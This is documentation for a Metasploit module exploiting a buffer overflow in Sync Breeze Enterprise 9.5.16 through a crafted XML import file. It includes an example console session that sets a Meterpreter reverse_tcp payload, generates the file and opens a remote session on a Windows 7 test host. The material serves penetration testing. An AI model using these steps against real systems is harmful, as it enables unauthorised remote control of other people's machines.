1.7 KiB
1.7 KiB
This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16 by using the import command option to import a specially crafted xml file.
Vulnerable Application
This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at Exploit-DB.
Verification Steps
- Start msfconsole
- Do:
exploit/windows/fileformat/syncbreeze_xml - Do:
set PAYLOAD [PAYLOAD] - Do:
run
Example
msf > use exploit/windows/fileformat/syncbreeze_xml
msf exploit(windows/fileformat/syncbreeze_xml) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/fileformat/syncbreeze_xml) > set LHOST 192.168.216.5
LHOST => 192.168.216.5
msf exploit(windows/fileformat/syncbreeze_xml) > run
[*] Creating 'msf.xml' file ...
[+] msf.xml stored at /root/.msf4/local/msf.xml
msf exploit(windows/fileformat/syncbreeze_xml) > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.216.5
LHOST => 192.168.216.5
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.216.5:4444
[*] Sending stage (179779 bytes) to 192.168.216.137
[*] Meterpreter session 1 opened (192.168.216.5:4444 -> 192.168.216.137:49830) at 2018-01-15 15:32:02 -0500
meterpreter > sysinfo
Computer : IE11WIN7
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >